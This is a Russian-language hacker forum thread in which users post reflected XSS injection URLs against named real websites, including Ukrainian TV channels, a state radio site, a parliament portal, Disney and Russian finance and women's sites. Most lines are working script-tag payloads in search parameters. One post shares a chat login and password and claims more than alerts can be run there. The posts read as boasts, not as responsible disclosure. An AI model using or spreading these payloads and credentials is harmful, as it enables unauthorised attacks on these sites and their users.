Вот нашел баг Xss на сайте телеканала ИНТЕР
в Украине...

_http://www.inter.ua/ua/search/?lang='><script>alert('HakNet')</script>
----------------------------------------------------
Вот нашел баг Xss на сайте телеканала ICTV
в Украине...

_http://ictv.ua/ukr/search.php?search=1&news_search=1&news_search_word s=&news_search_cond=&news_search_exact=&news_searc h_numrows=&search_section_id=0&search_words=%27%3E %3Cscript%3Ealert%28%27HakNet%27%29%3C%2Fscript%3E &search_cond=1&search_exact=1&search_numrows=5

HakNet не плохо.

Вот мой баг XSS на сайте transnavi :

_http://www.transnavi.com/search/?search_key="><script>alert()</script>

_http://www.context-ua.com/cgi-bin/query?text='><script>alert('HakNet')</script>

_http://your-radio.dp.ua/modules.php?name=News&file=search&query='><script> alert('HakNet')</script>

_http://nrcu.gov.ua/search.php?id_main=1&where=1&search='><script>aler t('HakNet')</script>

http://parlament.org.ua - в поиску вказать '><script>alert('HakNet')</script>

Кароче нашел глюченой чат ...
Простите чо в етом розделе...но просто пашет прикольно XSS

link: http://www.elib.ru/cgi-bin/Chat.pl

login: lol
pass: 1988

ожно и не только ето
'><script>alert('HakNet')</script>
а и много другого...))) пашет всё..

Ну бедный дядюшка Disney и на его сайте есть XSS

http://search.disney.go.com/?oq='><script>alert('HakNet')</script>

Вот Xss на журнале НАТАЛИ в Украине
http://www.natali.ua/materials/search/%20"><script>alert()</script>

Бесполезно, но улыбнуло =)
http://www.blizzard.com/support/wow/?id=aww01671p'

_http://search.finam.ru/cgi-bin/ff.pl?query="><script>alert('dracula4ever')</script>

_http://www.myjane.ru/search/default.asp?searchword="><script>alert('dracula4ev er')</script>